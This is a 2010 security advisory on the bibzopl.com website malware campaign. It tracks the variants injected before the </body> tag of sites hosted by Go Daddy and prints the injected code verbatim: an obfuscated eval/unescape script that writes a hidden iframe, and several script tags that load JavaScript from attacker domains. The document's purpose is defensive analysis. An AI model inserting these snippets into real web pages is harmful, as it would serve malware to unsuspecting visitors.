bibzopl.com Malware
Updated: May 20, 2010
The bibzopl.com malware places a malware script right before </body> tag of a website's pages.
The original script, which began being placed on websites in February, created an iframe pointing to http://bibzopl.com/in.php.
Several weeks ago a new variant began being placed on websites that called a JavaScript file from the IP address 61.4.82.212 and then from the domain cechirecom.com. On May 1 a variant called a JavaScript file from the domain kdjkfjskdfjlskdjf.com. On May 12, a variant called a JavaScript file from the domain holasionweb.com. Most recently, on May 17 and May 20, a variant called a JavaScript file from the domain losotrana.com.
bibzopl.com version
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%69%62%7A%6F%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
61.4.82.212 version
<script src="http://61.4.82.212/js.php"></script>
cechirecom.com version
<script src="http://cechirecom.com/js.php"></script>
kdjkfjskdfjlskdjf.com version
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
holasionweb.com version
<script src="http://holasionweb.com/oo.php"></script>
losotrana.com version
<script src="http://losotrana.com/js.php"></script>
The malware script is generated with the following php script that is placed at the top of the website's .php files:
bibzopl.com version
61.4.82.212 version
cechirecom.com version
kdjkfjskdfjlskdjf.com version
holasionweb.com version
losotrana.com version
The php script is added to the website's .php files with another php file, that file is removed from the website when it is run. It is most likely that the file, which infects the .php files with the malware, is added to the website due to a security vulnerability within Go Daddy's systems. This malware appears to only affect websites hosted by Go Daddy, though similar malware has infected other providers. It is not limited to website with WordPress installations as some people, including Go Daddy, have been claiming. Go Daddy has variously claimed that the malware is due to banner ads, it is due to third party software, that they cannot comment of the issue due to security protocol, that it is due to outdated WordPress installations, and that they do not have security vulnerability that is causing the infection. In Go Daddy's most recent, on May 12, statement on the issue they claimed the source of the issue is users with outdated software that has been exploited. On May 13, an Go Daddy employee said in their support forum that they did not know the source of the infection. If you are Go Daddy customer who has been infected, we would be interested to know what response you have received from Go Daddy about this issue.